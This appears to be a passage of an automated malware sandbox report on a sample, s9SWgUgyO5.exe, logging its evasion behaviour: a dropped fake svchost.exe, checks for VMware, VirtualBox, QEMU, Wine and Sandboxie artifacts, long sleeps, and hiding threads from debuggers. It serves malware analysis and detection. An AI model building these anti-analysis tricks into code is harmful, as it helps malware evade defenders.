            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.6140000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.40a9590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4814f60.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.6140000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.40a9590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3f29550.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.67f0000.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.4f84f60.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3ee9530.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.s9SWgUgyO5.exe.3ec9510.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.6100000.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.322095738.0000000006140000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.383552870.0000000006100000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.392538687.00000000067F0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382145337.0000000004814000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.359524967.0000000004814000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390697273.0000000004F84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376186013.0000000004F84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288117439.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: s9SWgUgyO5.exe, 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
            Source: s9SWgUgyO5.exe, 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: SBIEDLL.DLLUSER
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -13835058055282155s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 2144 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep count: 3861 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep count: 123 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7008Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exe TID: 2968Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exe TID: 1388Thread sleep time: -320000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep count: 3189 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 123 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6884Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896Thread sleep count: 4416 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep count: 239 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2372Thread sleep count: 2948 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep count: 437 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 2490 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 363 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5136Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2030
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2144
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3861
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWindow / User API: threadDelayed 6326
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWindow / User API: threadDelayed 2445
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWindow / User API: foregroundWindowGot 546
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeWindow / User API: foregroundWindowGot 650
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3189
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2948
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 437
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2490
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
            Source: svchost.exe, 00000009.00000002.511314454.000002207D029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWmf~
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: vmware
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
            Source: svchost.exe, 00000009.00000002.515319906.000002207E663000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
            Source: svchost.exe, 00000009.00000002.515159784.000002207E64D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 0000000F.00000002.510482849.000001179A602000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
            Source: s9SWgUgyO5.exe, 00000000.00000000.270963595.000000000134C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: s9SWgUgyO5.exe, 00000000.00000000.287469319.0000000003EC9000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.364082141.0000000006100000.00000004.00020000.sdmp, svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: VMware SVGA II
            Source: svchost.exe, 0000001B.00000000.379116652.00000000067F0000.00000004.00020000.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: svchost.exe, 0000000F.00000002.510885221.000001179A63D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.511059015.0000019FFC029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\Public\Documents\???????????????\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess token adjusted: Debug
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess token adjusted: Debug
